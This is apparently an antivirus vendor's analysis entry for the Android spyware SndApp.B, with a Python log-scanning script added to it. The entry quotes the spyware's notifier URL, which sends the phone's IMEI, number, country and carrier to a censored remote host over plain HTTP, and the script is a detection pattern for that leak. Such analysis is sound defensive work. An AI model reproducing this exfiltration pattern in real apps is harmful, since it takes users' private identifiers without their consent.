Android/SndApp.B!tr
Analysis
Android/SndApp.B!tr is a variant of Android/SndApp.A!tr.spy.
The malware runs on Android phones, version 2.1 and above.
This variant does not send stored accounts or emails. It only sends the following information to a remote web site:
- IMEI
- phone number
- country
- operator
Technical Details
The malware consists of three main components:
- the main entry point, AirHorn, which is called when the victim launches the application;
- a background service, com.and.snd.AndroidSoundService;
- an installation referrer receiver.
http://[CENSORED]66.com/lead/e2c4x2a494x2/&pid=2738&aid=XXX&cookieid=YY
The remote end replies with an affiliate ID, subid, ext and cookie.
Then, when the victim launches the malware, the AirHorn class is created and verifies that the background AndroidSoundService is running (if not, runs it).
The malware retrieves the phone's IMEI, line number, network country ISO code and operator name, then visits the following URL:
http://[CENSORED]ios.com/android_notifier/notifier.php?app=airhorn&deviceId=IMEI&mobile=PHONENUMBER&country=COUNTRY&carrier=CARRIER
The IMEI and phone number, at least, are private information and should not be sent out without the user's consent, let alone in clear text over plain HTTP.
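The notifier request above is easy to spot from the network side because the device identifiers travel unencrypted in the query string. The following script is an added example, not code from the Fortinet page or from the malware: it scans constructed proxy-style log lines for GET requests whose query carries the deviceId/mobile/country/carrier parameters, checks whether the deviceId is a plausible IMEI (15 digits with a valid Luhn check digit) and whether the request went over plain HTTP. The hostnames, the log format and the sample identifier values are placeholders invented for the example.

```python
"""Flag HTTP requests that leak device identifiers in cleartext query strings.

Added example (not from the original page): looks for the exfiltration
pattern described above, a GET to android_notifier/notifier.php whose
query string carries deviceId, mobile, country and carrier.
"""
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Query parameter names listed on the page for the notifier request.
EXFIL_PARAMS = {"deviceId", "mobile", "country", "carrier"}

# Constructed proxy log lines in the form "<timestamp> <client> <method> <url>".
# "example-censored.invalid" stands in for the censored domain; the IMEI is the
# well-known documentation value 490154203237518, the phone number is fictional.
SAMPLE_LOG = """\
2019-04-12T10:01:02Z 10.0.0.7 GET http://example-censored.invalid/android_notifier/notifier.php?app=airhorn&deviceId=490154203237518&mobile=%2B15555550123&country=us&carrier=ExampleCarrier
2019-04-12T10:01:05Z 10.0.0.7 GET https://www.example.com/index.html
2019-04-12T10:02:11Z 10.0.0.9 GET http://example.net/search?q=airhorn&deviceId=notanimei
"""


def luhn_valid(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum used by IMEIs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def looks_like_imei(value: str) -> bool:
    """An IMEI is exactly 15 decimal digits whose last digit is a Luhn check digit."""
    return bool(re.fullmatch(r"\d{15}", value)) and luhn_valid(value)


def analyse_request(url: str) -> Optional[dict]:
    """Return a finding dict if the URL carries any of the exfiltration parameters."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)
    leaked = sorted(EXFIL_PARAMS & set(params))
    if not leaked:
        return None
    return {
        "host": parts.hostname,
        "path": parts.path,
        "cleartext": parts.scheme == "http",
        "leaked_params": leaked,
        # True only when deviceId is a checksum-valid IMEI, not just any string.
        "valid_imei": any(looks_like_imei(v) for v in params.get("deviceId", [])),
        "notifier_path": parts.path.endswith("/android_notifier/notifier.php"),
    }


def scan_log(text: str) -> list:
    """Run analyse_request over every log line and collect the findings in order."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        timestamp, client, _method, url = fields[:4]
        result = analyse_request(url)
        if result:
            result.update(timestamp=timestamp, client=client)
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The first sample line produces a finding with all four parameters, a checksum-valid IMEI and `cleartext` set, which is the combination worth alerting on; the third line shares only the `deviceId` name with a non-IMEI value and is kept as a low-confidence hit so an analyst can decide rather than the filter silently dropping it.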
Every hour, the malware may display a notification with a title, text and link; all of this content is supplied by the remote end.
Recommended Action
FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system; if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Detection Availability
Product | Detection Level
---|---
FortiGate | Extreme
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended
FortiEDR |
Version Updates
Date | Version | Detail
---|---|---
2019-04-12 | 67.75300 |